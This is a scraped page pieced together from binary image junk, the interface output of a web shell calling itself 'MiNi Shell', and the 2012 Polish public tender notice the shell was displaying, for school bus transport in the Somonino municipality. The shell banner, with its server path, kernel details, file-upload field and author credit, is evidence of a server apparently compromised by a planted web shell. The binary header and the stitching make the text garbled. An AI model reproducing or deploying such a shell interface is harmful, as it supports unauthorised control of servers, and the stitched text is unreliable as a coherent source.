JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/289398-N-2012.html

<p class="kh_header"><b>Somonino: Dowóz dzieci i młodzieży szkolnej do szkół na terenie gminy Somonino w roku szkolnym 2012-2013</b><br>
<b>Numer ogłoszenia: 289398 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Somonino , ul. Ceynowy, 83-314 Somonino, woj. pomorskie, tel. 058 6841121, faks 058 6841144.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz dzieci i młodzieży szkolnej do szkół na terenie gminy Somonino w roku szkolnym 2012-2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest systematyczny dowóz dzieci i młodzieży do szkół na terenie gminy Somonino w roku szkolnym 2012-2013 zgodnie z harmonogramem zajęć opracowanym  przez dyrektorów szkół ( w Goręczynie ; Somoninie ; oraz Egiertowie -przewidziany jest system dwuzmianowy ), a następnie ich rozwóz po zajęciach szkolnych wraz z zapewnieniem stałego nadzoru - opieki , podczas transportu ; wsiadania i wysiadania ; w miejscach przejść przez drogę.

Orientacyjne trasy dowozu oraz ilości osób do przewiezienia:

1.1 Do szkoły podstawowej w Egiertowie :
     a) z Piotrowa             - 15 osób
b) z Starkowej Huty   - 45 osób
c) z Kaplicy                - 25 osób
d) z Rybak                 -  5  osób
e) z Kameli                - 47  osób
     
1.2. Do gimnazjum w Somoninie :
      a) z Egiertowa           - 28 osób
      b) z Starkowej Huty   - 18  osób
      c) z Kaplicy                - 10  osób
      d) z Kameli                 - 18 osób
      e) z Połęczyna           - 30 osób
      f) z Rybak                  -  8  osób
      g) z Wyczechowa        - 10 osób
      h) z Hopowa                -  20 osób
       i) z Borcza                  - 40 osób

1.3.Do szkoły podstawowej w Goręczynie 
      a) z Ramlej                   - 30 osób
b) z Ostrzyc                  - 40 osób
c) z Rąt                         - 25 osób
d) ze Sławek                 - 34 osoby
e) z Dąbrowy                - 29 osób
 f) z Koszowatki            - 12 osób           

1.4.Do gimnazjum w Goreczynie
      a) z Ramlej                   - 12 osób
b) z Ostrzyc                  - 20 osób
c) z Rąt                         -   5 osób
d) ze Sławek                 - 10 osób
e) z Dąbrowy                - 13 osób
g) z Koszowatki            - 10 osób                                                                                                                           

Ogółem dowozy obejmują ok.
a) do Egiertowa  137 osoby
b) do Goręczyna - szkoła podstawowa - 170 osób
c) do Goręczyna - gimnazjum - 70 osób
d) do Somonina - gimnazjum - 182 osoby
i w ciągu 1 dnia odbywać się będą wg. następującego (orientacyjnego) harmonogramu:
Do Zespołu Szkół  w Goręczynie (2 autobusy - trasa przejazdu ogółem - ok. 280 km dziennie)  

I ZMIANA ( na ok.8.00 - 8.15 )
I trasa: - dowóz na trasie: Goręczyno - Sławki - Rąty - szkoła - Koszowatka -  
               Ostrzyce - Przedszkole - szkoła 
II trasa: - dowóz na trasie: Ostrzyce-Ramleje - szkoła - Dąbrowa - Przedszkole -   
                 szkoła 
II ZMIANA ( na godz. ok. 11.00 )
III trasa:  - dowóz na trasie: Goręczyno - Sławki - Rąty - szkoła - Koszowatka -  
                  Ostrzyce - szkoła
IV trasa - dowóz dzieci klasy (0) z miejscowości Ramleje, Dąbrowa, Ostrzyce, Sławki, Rąty  
                 oraz Koszowatka                        
V trasa:  - odwóz na trasie: szkoła - Ostrzyce - Ramleje - Goręczyno - Dąbrowa 
ODWOZY ( od godz. ok. 14.00 )
VI trasa :  - odwóz na trasie: szkoła - Sławki - Rąty - Koszowatka - Ostrzyce
VII trasa:  - odwóz na trasie: szkoła - Przedszkole - Dąbrowa - Ramleje - Ostrzyce     
Do szkoły podstawowej w Egiertowie oraz gimnazjum w Somoninie  (3 autobusy - trasa przejazdu ogółem - ok. 390 km dziennie )

I ZMIANA ( na godz. ok. 8.00 - 8.15 )
I trasa: - dowóz na trasie: Egiertowo-Połęczyno-Kaplica-Starkowa Huta (część)- 
               Egiertowo 
II trasa: - Piotrowo - Rybaki - Egiertowo 
III trasa: - Egiertowo - Kamela - Somonino 
IV trasa: - Somonino - Wyczechowo - Kamela - Egiertowo 
V trasa: - Egiertowo - Hopowo - Borcz - Wyczechowo - Egiertowo 
VI trasa: - dowóz na trasie: Piotrowo - Rybaki - Starkowa Huta (część) - Egiertowo 
VII trasa: - dowóz na trasie: Egiertowo - Kamela - Egiertowo  
VIII trasa: - dowóz na trasie: Egiertowo - Somonino ( ok. 182 osób )

II ZMIANA ( na godz. ok. 11.30 ) 
IX trasa: - odwóz z równoczesnym dowozem na trasie: Egiertowo-Starkowa Huta- 

                Piotrowo-Egiertowo
X trasa: - Egiertowo - Połęczyno - Kaplica - Rybaki - Egiertowo 
XI trasa: - Egiertowo - Połęczyno - Kaplica - Piotrowo - Somonino 
XII trasa: - Somonino - Kamela - Starkowa Huta 
XIII trasa: - odwóz z równoczesnym dowozem na trasie: Egiertowo - Kamela -   
                 Egiertowo

ODWOZY ( na godz. ok. 14.00 )
XIV trasa: - odwóz na trasie Somonino - Egiertowo ( ok. 182 osób )
XV trasa: - odwóz na trasie: Egiertowo - Połęczyno - Kaplica - Starkowa Huta     
XVI trasa: - odwóz na trasie : Egiertowo - Kamela 

ODWOZY ( na godz. ok. 17.00 )
XVII trasa: - odwóz na trasie: Egiertowo - Piotrowo - Rybaki - Starkowa Huta
XVIII trasa: - odwóz na trasie: Egiertowo - Hopowo.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej   
ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach  określonych w art. 67 ust.1 pkt 6 ustawy.
Zamówienie uzupełniające polegać będzie na zwiększonej ilości przejazdów do poszczególnych placówek oświatowych w związku z realizacją programów unijnych w ramach których prowadzone będą zajęcia dodatkowe.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 03.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  5.000,- zł (słownie: pięćtysięcyzłotych 00/100).
W przypadku ofert częściowych:  - 2.000,- przy dowozie do Goręczyna,
                                                      - 3.000,- przy dowozie do Egiertowa i Somonina</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w.w warunek za spełniony, jeżeli Wykonawca wykaże się posiadaniem uprawnień - koncesji do przewozu osób minimum na terenie powiatu kartuskiego.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w.w warunek za spełniony, jeżeli Wykonawca wykaże się wykonaniem w okresie ostatnich trzech lat przed upływem terminy składania ofert, a jeżeli okres prowadzenie działalności jest krótszy - w tym okresie, co najmniej jednej usługi o wartości minimum 100.000,- zł brutto (słownie:stotysięcyzłotych), polegającej na świadczeniu usług przewozu osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w.w warunek za spełniony, jeżeli Wykonawca wykaże się dysponowaniem  (lub będzie dysponował) co najmniej pięcioma autobusami (w przypadku oferty częściowej co najmniej trzema autobusami przy dowozie do szkół w Egiertowie i Somoninie, oraz co najmniej dwoma autobusami przy dowozie do Zespołu Szkół w Goręczynie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w.w warunek za spełniony, jeżeli Wykonawca wykaże się dysponowaniem  (lub będzie dysponował) co najmniej pięcioma osobami posiadającymi uprawnienia do kierowania autobusami. (w przypadku oferty częściowej co najmniej trzema osobami przy dowozie do szkół w Egiertowie i Somoninie, oraz co najmniej dwoma osobami przy dowozie do Zespołu Szkół w Goręczynie)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w.w warunek za spełniony, jeżeli Wykonawca wykaże się posiadaniem ubezpieczenia od odpowiedzialności cywilnej - OC oraz ubezpieczenia NW na posiadane pojazdy (pojazdy będące w dyspozycji).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Niedopuszczalne pod rygorem nieważności są zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, z wyjątkiem zmian o których mowa w pkt. 2.
2.	Zmiany w umowie mogą dotyczyć:
1)	terminu wykonania zamówienia,
2)	wysokości wynagrodzenia Wykonawcy,
3)	udziału osobowego wykonawców usług,
3.	Zmiana terminu wykonania zamówienia może nastąpić w przypadku:
1)	przesunięcia terminu prowadzenia zajęć szkolnych; 
2)	z przyczyn niezawinionych przez Wykonawcę
4.	Zmiana wysokości wynagrodzenia Wykonawcy może nastąpić w przypadku zmiany stawki podatku VAT.
5.	Zmiana osobowa wykonawców usług może nastąpić w przypadku:
1)	zdarzeń losowych niezależnych od Wykonawcy,(np. choroba, śmierć, itp.)
2)	utraty uprawnień przez wskazane przez Wykonawcę osoby,
6.	W przypadku zmiany osób Wykonawca winien przedstawić Zamawiającemu nowe osoby o niezgorszych kwalifikacjach i uprawnieniach w stosunku do osób, które zostały wskazane w ofercie Wykonawcy.
7.	Warunki dokonywania zmian:
1)	uzasadnienie konieczności i wpływu zmian na realizację zamówienia,
2)	w formie pisemnego aneksu do umowy pod rygorem nieważności takiej zmiany.
8.	 Zmiany zapisów umowy, które nie odnoszą się do treści oferty nie wymagają pisemnego aneksu pod rygorem nieważności. Za zmiany takie uważa się np.:
1)	zmianę rachunku bankowego,
2)	zmiany adresowe.
9.	 Strony zobowiązane są do wzajemnego powiadomienia się na piśmie o zmianach, o których mowa w pkt. 8.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.somonino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Somoninie, ul. Ceynowy 21, 83-314 Somonino , pokój nr 13 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 09:00, miejsce: Punkt Obsługi Interesanta w Urzędzie Gminy w Somoninie, ul. Ceynowy 21, 83-314 Somonino - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowozy do Zespołu Szkół w Goręczynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasy od I do VII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowozy do Egiertowa i Somonina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trasy od I do XVIII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 03.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com